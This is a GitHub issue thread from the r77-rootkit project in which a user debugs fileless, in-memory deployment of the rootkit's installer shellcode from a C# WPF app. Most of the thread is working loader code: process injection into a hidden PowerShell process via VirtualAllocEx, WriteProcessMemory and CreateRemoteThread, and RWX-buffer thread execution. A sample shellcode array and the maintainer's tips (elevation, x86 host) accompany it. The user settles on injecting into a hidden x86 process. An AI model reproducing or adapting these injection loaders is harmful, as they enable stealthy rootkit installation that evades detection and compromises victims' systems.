#//~~ Long time without talk! ^- ^ [ HELP ]

I still developing my project, but I need some help @bytecode77! 🙏🙏

I need use the Install.ShellCode to run it directly into memory, without drop/write any executeable. But I cant handle works flewless.... 😭😭

Today I spend all the day to create this process... 🥴🥴

Scenario: On my main program, I have 2 Buttons(Only one "works"), one for INSTALL & the other for UNNISTAILL. The plan was that, create a powershell process that appear hidden, only for 3 seconds, and then inject the ShellCode into that process. 🧐🧐

Works nice, but I reboot my machine & now STOP working... 🤷‍♂️🤷‍♂️🤷‍♂️ I think Its more easy & It be less complicated, but I need a bit of help. 😅😅

Thats the function actually Im using it:

public class C9_SH_LOADER
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);

    [DllImport("kernel32.dll")]
    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten);

    [DllImport("kernel32.dll")]
    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    [Flags]
    public enum AllocationType
    {
        Commit = 0x1000,
        Reserve = 0x2000,
        Reset = 0x80000,
        LargePages = 0x20000000,
        Physical = 0x400000,
        TopDown = 0x100000,
        WriteWatch = 0x200000
    }

    [Flags]
    public enum MemoryProtection
    {
        Execute = 0x10,
        ExecuteRead = 0x20,
        ExecuteReadWrite = 0x40,
        ExecuteWriteCopy = 0x80,
        NoAccess = 0x01,
        ReadOnly = 0x02,
        ReadWrite = 0x04,
        WriteCopy = 0x08,
        GuardModifierflag = 0x100,
        NoCacheModifierflag = 0x200,
        WriteCombineModifierflag = 0x400
    }

    public static async Task ExecuteShellcodeInDummyProcess()
    {
        byte[] shellcode = new byte[168856]
{
                    0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
                0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
                0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
                0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
                0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
                0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
                0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
                0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
                0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
                0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
                0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
                0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
                0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };

        // Create a new process to host the shellcode
        Process dummyProcess = new Process();
        dummyProcess.StartInfo.FileName = "PowerShell.exe -WindowStyle hidden Timeout /NoBreak /T 3;exit"; // Use an existing executable as a dummy process here ...
        dummyProcess.StartInfo.UseShellExecute = false;
        dummyProcess.StartInfo.CreateNoWindow = true;

        dummyProcess.Start();

        await Task.Delay(1000); // Delay to allow the process to start

        // Abre el proceso con los permisos deseados
        IntPtr processHandle = OpenProcess(0x001F0FFF, false, dummyProcess.Id);

        if (processHandle != IntPtr.Zero)
        {
            // Allocate memory within the remote process
            IntPtr allocatedMemory = VirtualAllocEx(processHandle, IntPtr.Zero, (uint)shellcode.Length, AllocationType.Commit, MemoryProtection.ExecuteReadWrite);

            if (allocatedMemory != IntPtr.Zero)
            {
                // Write the shellcode into the remote process
                int bytesWritten;
                WriteProcessMemory(processHandle, allocatedMemory, shellcode, (uint)shellcode.Length, out bytesWritten);

                // Create a remote thread to execute the shellcode
                IntPtr threadHandle = CreateRemoteThread(processHandle, IntPtr.Zero, 0, allocatedMemory, IntPtr.Zero, 0, IntPtr.Zero);

                if (threadHandle != IntPtr.Zero)
                {
                    // Wait for the remote thread to finish
                    WaitForSingleObject(threadHandle, 0xFFFFFFFF);
                }
                else
                {
                    Console.WriteLine("Failed to create remote thread.");
                }
            }
            else
            {
                Console.WriteLine("Failed to allocate memory in the remote process.");
            }

            CloseHandle(processHandle);
        }
        else
        {
            Console.WriteLine("Failed to open process.");
        }
    }
}

_And then on the Click_EventBtn I have that:

private async void INSTALL_Click(object sender, RoutedEventArgs e)
        {
            await C9_SH_LOADER.ExecuteShellcodeInDummyProcess();
        }

### PS = The Actual ShellCode Writted In This Code, Its Just A Dummy ShellCode! — ( calc.exe )

Mmmm... I dont understand that... 😓😓

When I compile like that:

using System;
using System.Runtime.InteropServices;

public static class Program
{
    public static void Main()
    {
        // 1. Load Install.shellcode from resources
        byte[] shellCode;

        // Load the shellcode from resources by its name "C9_ShellCode"
        shellCode = ShellCode.Properties.Resources.Install_shellcode; // Assuming the shellcode is stored as a resource in the project

        // 2. Create an RWX buffer with the shellcode
        IntPtr buffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, 0x1000, 0x40);
        Marshal.Copy(shellCode, 0, buffer, shellCode.Length);

        // 3. Start the shellcode in a thread and wait until it terminates
        IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
        WaitForSingleObject(thread, 0xffffffff);

        // Free the allocated memory after executing the shellcode
        VirtualFree(buffer, UIntPtr.Zero, 0x8000);
    }

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool VirtualFree(IntPtr lpAddress, UIntPtr dwSize, uint dwFreeType);
}

Then WORKS!

But when I try to create a function and call it when I press a button, dont work. IDK.... 😭😭


        private const int PROCESS_ALL_ACCESS = 0x1F0FFF;
        private const uint MEM_COMMIT = 0x00001000;
        private const uint MEM_RESERVE = 0x00002000;
        private const uint PAGE_EXECUTE_READWRITE = 0x40;

        [DllImport("kernel32.dll", SetLastError = true)]
        private static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll", SetLastError = true)]
        private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

        [DllImport("kernel32.dll", SetLastError = true)]
        private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

        [DllImport("kernel32.dll", SetLastError = true)]
        private static extern bool VirtualFree(IntPtr lpAddress, UIntPtr dwSize, uint dwFreeType);

        public void C9__INIT__INSTALL__STAGE()
        {
            // 1. Load Install.shellcode from resources
            byte[] shellCode;

            // Load the shellcode from resources by its name "C9_ShellCode"
            shellCode = C9_LOADER.Properties.Resources.Install_shellcode; // Assuming the shellcode is stored as a resource in the project

            // 2. Create an RWX buffer with the shellcode
            IntPtr buffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, 0x1000, 0x40);
            Marshal.Copy(shellCode, 0, buffer, shellCode.Length);

            // 3. Start the shellcode in a thread and wait until it terminates
            IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
            WaitForSingleObject(thread, 0xffffffff);

            // Free the allocated memory after executing the shellcode
            VirtualFree(buffer, UIntPtr.Zero, 0x8000);
        }

        public void INSTALL_Click(object sender, RoutedEventArgs e)
        {

            C9__INIT__INSTALL__STAGE();

        }

The truth, I don't know what Im doing wrong, rlly... 😥😥

Im still trying to make it works during today... 😪😪

Just don't use chatgpt to write code

Just don't use chatgpt to write code

🥴 🥴 ¿ ? ¿ ? ¿ ? ¿ ? 🥴 🥴

Only used this example.cs code made By bytecode77 as a reference, not ChatGPT 😅 😅

@sa6ta6ni6c :
I have to understand that your comment is just to try to annoy or there are intentions to help behind it? 🤷‍♂️🤔

‎ [ UPDATE LOG ]

Now I'm even more confused, because this Install.shellcode sometimes it works and sometimes it doesn't.... used to seem to work and run as Install.exe should but now it doesn't anymore.... 🤷‍♂️🤷‍♂️🤷‍♂️🤯🤯🤯

Just a few quick questions... Why do you create a new dummy process to run the shellcode? It's enough to create a thread and run it there. And secondly, does your process run with elevated privileges? If it doesn't, then installation will fail. One more thing to keep in mind is that the hosting process must be 32-bit. If you just run Powershell.exe, then that process will certainly be the 64-bit executable.

I suggest that you run the shellcode within the current process, make sure it's elevated and x86. Can you try that? If this doesn't work, could you please debug into this VirtualAlloc ... CreateThread and tell me which one of this API calls fail? i.e. which one returns an error result. Please remember to run Visual Studio with elevated privileges as well when debugging the shellcode installation.

Just a few quick questions... Why do you create a new dummy process to run the shellcode? It's enough to create a thread and run it there. And secondly, does your process run with elevated privileges? If it doesn't, then installation will fail. One more thing to keep in mind is that the hosting process must be 32-bit. If you just run Powershell.exe, then that process will certainly be the 64-bit executable.

I suggest that you run the shellcode within the current process, make sure it's elevated and x86. Can you try that? If this doesn't work, could you please debug into this VirtualAlloc ... CreateThread and tell me which one of this API calls fail? i.e. which one returns an error result. Please remember to run Visual Studio with elevated privileges as well when debugging the shellcode installation.

Yeah, I have already patched my OS to RUN everything with the highest Admin permissions, so it shouldn't be a permissions issue.✌ ‎
In terms of architecture, there shouldn't be any problem either. Considering, that both my project and all the "mini-test projects" are set to run on x86, there shouldn't be any incompatibility problem with the ShellCode execution.

‎

Why do I want to start it in a different process?

Well, I was testing (at least when it worked 🤷‍♂️), before I started using as template the example you use to load directly the Install.shellcode from resources, I used directly the ShellCode loaded in the code of my program... I was testing and testing... but I always crashed the thread I created to store the shellcode. Then I was doing injection tests to different processes, and I realized that some of them worked and with others not. For example, if I used the calc.exe process (I'm talking about the classic version of win32calc.exe) for some reason the shellcode was not injected, but when I did it with for example the notepad.exe process then it worked.

But well, as I started using your shellcode loader model, I left that research path. 😅 But now, is that the problem I have, before, your code without receiving any modification or anything, it worked perfectly for me, but now I don't know why, it doesn't work for me, and suddenly, there are times when it does. IDK....

I don't know, it's very strange... I'm doing my main project in WPF of C#, I don't know if I should use another design guideline different from the one you show as an example of C#. ‎

And as for the DEBUGGING, the only thing I get by console is this:

[ ‎ CMD.EXE ‎ ]

ShellCode.exe (process 69360) was closed with code 0.
To automatically close the console when debugging stops, enable Tools ->Options ->Debugging ->Close console automatically when debugging stops.
Press any key to close this window. . .

‎

[ ‎ VISUAL STUDIO DEBUG CONSOLE ‎ ]

'ShellCode.exe' (CoreCLR: DefaultDomain): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Private.CoreLib.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Usersers\Rootkit.SYSourceSourceRepositoryShellCodeShellCodeCodeBinix.0ShellCode.dll' loaded. The module was compiled without symbols.
ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Runtime.dll' loaded. Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'c:\program files\microsoft visual studio\2022\community\common7\idecommonextensions\microsoft\hotreload\Microsoft.Extensions.DotNetDeltaApplier.dll' loaded. Symbol loading was skipped. The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.IO.Pipes.dll' loaded. Symbol loading was skipped.The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Linq.dll' loaded.Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Collections.dll' loaded.Symbol loading was skipped. The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Console.dll' loaded. 
ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Threading.dll' loaded.Symbol loading was skipped.The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Runtime.InteropServices.dll' loaded.Symbol loading was skipped.The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Threading.Overlapped.dll' loaded.Symbol loading was skipped.The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Security.AccessControl.dll' loaded.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Security.Principal.Windows.dll' loaded.Symbol loading was skipped.The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Security.Claims.dll' loaded.Symbol loading was skipped.The module is optimized and the 'Only my code' debugger option is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Runtime.Loader.dll' loaded.Symbol loading was skipped.The module is optimized and the debugger option 'Only my code' is enabled.
'ShellCode.exe' (CoreCLR: clrhost): 'C:\Program Files (x86)\dotnetshared\Microsoft.NETCore.App\8.0.2\System.Collections.Concurrent.dll' loaded.Symbol loading was skipped.The module is optimized and the debugger option 'Only my code' is enabled.

The program '[69360] ShellCode.exe' terminated with code 0 (0x0).

The truth is, due to my inexperience with WinApi functions, I'm probably not seeing the obvious, but at least, from here, everything seems to be running fine, or at least that's the feeling I have, that all WinApi functions are running correctly, but once the Install.Shellcode program is finished it has not been executed. I have checked that it is well implemented as a resource, but well, if it wasn't, I guess I would have noticed it. 😓

‎

‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎CODE ‎ USED ‎ FOR ‎ THAT ‎ RESULTS ‎ & ‎ CHECKS

⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛ ⮛

using System;
using System.Runtime.InteropServices;

public static class Program
{
    public static void Main()
    {
        try
        {
            // --- Elevated privileges required ---
            Console.WriteLine(" ");
            // 1. Load Install.shellcode from resources or from a byte[]
            byte[] shellCode = ShellCode.Properties.Resources.Install_shellcode;
            Console.WriteLine("  #>  Install.shellcode loaded successfully from Resources!  —  OK");

            // 2. Create an RWX buffer with the shellcode.
            IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
            if (buffer == IntPtr.Zero)
            {
                Console.WriteLine("  #>  Failed to allocate memory for shellcode buffer.    —  FAIL");
                return;
            }
            Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
            Console.WriteLine("  #>  Shellcode copied to allocated buffer sucessfully!      —  OK");

            // 3. Start the shellcode in a thread and wait until it terminates.
            IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
            if (thread == IntPtr.Zero)
            {
                Console.WriteLine("  #>  Failed to create a new thread for shellcode execution.  —  FAIL");
                return;
            }
            Console.WriteLine("  #>  Shellcode execution started sucessfully!               —  OK");

            // Wait for the thread to finish
            WaitForSingleObject(thread, 0xffffffff);
            Console.WriteLine("  #>  Shellcode execution completed!                         —  OK");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"  #>  An unexpected error occurred: {ex.Message}");
        }
    }

    [DllImport("kernel32.dll")]
    private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);

    [DllImport("kernel32.dll")]
    private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);

    [DllImport("kernel32.dll")]
    private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
}

If this doesn't work, could you please debug into this VirtualAlloc ... CreateThread and tell me which one of this API calls fail? i.e. which one returns an error result. ‎

Post Sentence :

In the last tests I did, without creating any dummy process or anything, but creating a new thread for the ShellCode, I put several checks to check the exact point where it failed and everything is OK! until the CreateThread(), there the thread is created but the second it crashes and therefore the main Thread too. 😭😭😥😥

Im on that stage atm, stucked af 😭😭

Everything seems works, but at the same time not. 🥴🥴

//> ‎‎ ‎ ‎ ‎‎ ‎ ‎ [ ‎ ‎ UPDATE ‎ ‎ ]‎ ‎‎ ‎ ‎ ‎‎ ‎ ‎ —— ‎‎ ‎ ‎ ‎‎ ‎ ‎ PROBLEM‎ ‎ ‎ PERSISTS‎ ‎‎ ‎ ‎ ‎‎ ‎ ‎ —— ‎‎ ‎ ‎ ‎‎ ‎ ‎ 17/04/2024 ‎‎ ‎ ‎ 21:33PM

▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ‎

Okay‎ ‎ I ‎ am ‎ gonna ‎ turn ‎ *** ‎ crazy...‎ ‎ Rlly!!‎ 🤷‍♂️‎ 🤷‍♂️‎ 🤯‎ 🤯

Now without touching nothing, now stop working!! Idk, what happening @bytecode77 🥴🥴🤦‍♂️🤦‍♂️😭😭

[ ‎ ‎ EDIT ON THE AIR WHILE CODING & REDACTING THIS MESSAGE‎‎ ‎ ‎ ]

The test project, in which ONLY your template is written, works 100% now!!

—————————————————————————————————————————————————————————

I don't know, but the feeling I get, is as if the memory space or the RWX Buffer, is not available always/at every startup in my program thread. 🤔

Its just a theory, ofc...

And that is why sometimes it works and sometimes it does not. 🤷‍♂️

Or... am I missing something in all this to get this code to work in my C# WPF project. 📋 ‎ ‎

Pls, can you tell me what is wrong here?? 🙏 🙏

Because the ShellCode works fine, but without doing nothing on the code, ‎ ‎‎ ‎ just close the program & start again, now dont works... 😥 😥 🤷‍♂️ 🤷‍♂️ ‎


        public void INSTALL_Click(object sender, RoutedEventArgs e)
        {

            C9__INIT__INSTALL__STAGE();

        }

        public static void C9__INIT__INSTALL__STAGE()
        {

            // --- Elevated privileges required ---
            Debug.WriteLine(" ");
            // 1. Load Install.shellcode from resources or from a byte[]
            byte[] shellCode = C9_LOADER.Properties.Resources.Install_shellcode;
            Debug.WriteLine("  #>  Install.shellcode loaded successfully from Resources!  —  OK");

            // 2. Create an RWX buffer with the shellcode.
            IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
            if (buffer == IntPtr.Zero)
            {
                Debug.WriteLine("  #>  Failed to allocate memory for shellcode buffer.    —  FAIL");

            }
            Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
            Debug.WriteLine("  #>  Shellcode copied to allocated buffer sucessfully!      —  OK");

            // 3. Start the shellcode in a thread and wait until it terminates.
            IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
            if (thread == IntPtr.Zero)
            {
                Debug.WriteLine("  #>  Failed to create a new thread for shellcode execution.  —  FAIL");

            }
            Debug.WriteLine("  #>  Shellcode execution started sucessfully!               —  OK");

            // Wait for the thread to finish
            WaitForSingleObject(thread, 0xffffffff);
            Debug.WriteLine("  #>  Shellcode execution completed!                         —  OK");
        }

        [DllImport("kernel32.dll")]
        private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);

        [DllImport("kernel32.dll")]
        private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);

        [DllImport("kernel32.dll")]
        private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);

//> ‎‎ ‎ ‎ ‎‎ ‎ ‎ [ ‎ ‎ UPDATE ‎ ‎ ]‎ ‎‎ ‎ ‎ ‎‎ ‎ ‎ —— ‎‎ ‎ ‎ ‎‎ ‎ ‎ PROBLEM‎ ‎ ‎ PERSISTS‎ ‎‎ ‎ ‎ ‎‎ ‎ ‎ —— ‎‎ ‎ ‎ ‎‎ ‎ ‎ 18/04/2024 ‎‎ ‎ ‎ 17:07PM

//> ‎‎ ‎ ‎ ‎‎ ‎ ‎ { ‎ ‎ VIDEO ‎ ‎ PREVIEW ‎ ‎ CONCEPT ‎ ‎ ATTACHED ‎ ‎ TO ‎ ‎ THIS ‎ ‎ POST ‎ ‎ }

▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓

- Nothing, I try it a lot of times, diferent methods, diferents things, but the Shellcode sometimes work, sometimes not...

Why?? IDK, I record a video preview, I hope you can understand what are happening @bytecode77 🤔🤷‍♂️ 🥴

https://github.com/bytecode77/r77-rootkit/assets/72263269/46afe89e-6618-426d-abe6-f82df22be4ec

//> ‎‎ ‎ ‎ ‎‎ ‎ ‎ [ ‎ ‎ FINISHED ‎ ‎ ]‎ ‎‎ ‎ ‎ ‎‎ ‎ ‎ —— ‎‎ ‎ ‎ ‎‎ ‎ ‎ PROBLEM‎ ‎ ‎ FIXED‎ ‎‎ ‎ ‎ ‎‎ ‎ ‎ —— ‎‎ ‎ ‎ ‎‎ ‎ ‎ 18/04/2024 ‎‎ ‎ ‎ 23:33PM

//> ‎‎ ‎ ‎ ‎‎ ‎ ‎ { ‎ ‎ END ‎ ‎ OF ‎ ‎ THE ‎ ‎ ISSUE ‎ ‎ ‎ ‎ | ‎ ‎ ‎ ‎ END ‎ ‎ OF ‎ ‎ THIS ‎ ‎ JOURNEY ‎ ‎ } ‎‎ ‎ ⭐ ⭐ ⭐ ⭐ ⭐ ‎ ‎ ‎ ‎ 🙏🧡

▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ‎ ‎

Apparently, the problem was inside my main program, which had some functions running on x64 architecture. (As it was not well defined the part of the process which would not be affected by anything related to the above mentioned x64 architecture and I don't know how to do it correctly, the truth...) the shellcode did NOT work in many occasions, it ONLY worked in the occasions in which the memory area which was reserved to host the shellcode, was exclusively x86. 🥴

‎ ‎ So, I went back to my old development path, creating a CMD.EXE console with special attributes to be invisible and inside that CMD.EXE console created, then I could generate an exclusive process, entirely with x86 architecture to be able to inject the shellcode without ANY problem 100% of the time. ✔

‎ ‎

So if there is nothing more to add, when you read all this @bytecode77, you can close this Github thread. 📩 📋 😎

The truth is that it has been a hard path in which I have learned a lot about the memory management and processes in general, ‎ ‎ about how shellcodes work and how inject them into the different Windows processes. 🧡 🔥 📋 ✌

‎ ‎

Okay, I see that you've been analyzing the issue and fixed it. That's pretty much what takes up 90 % of my development time for this project.

Glad to hear everything works.

bytecode77 / r77-rootkit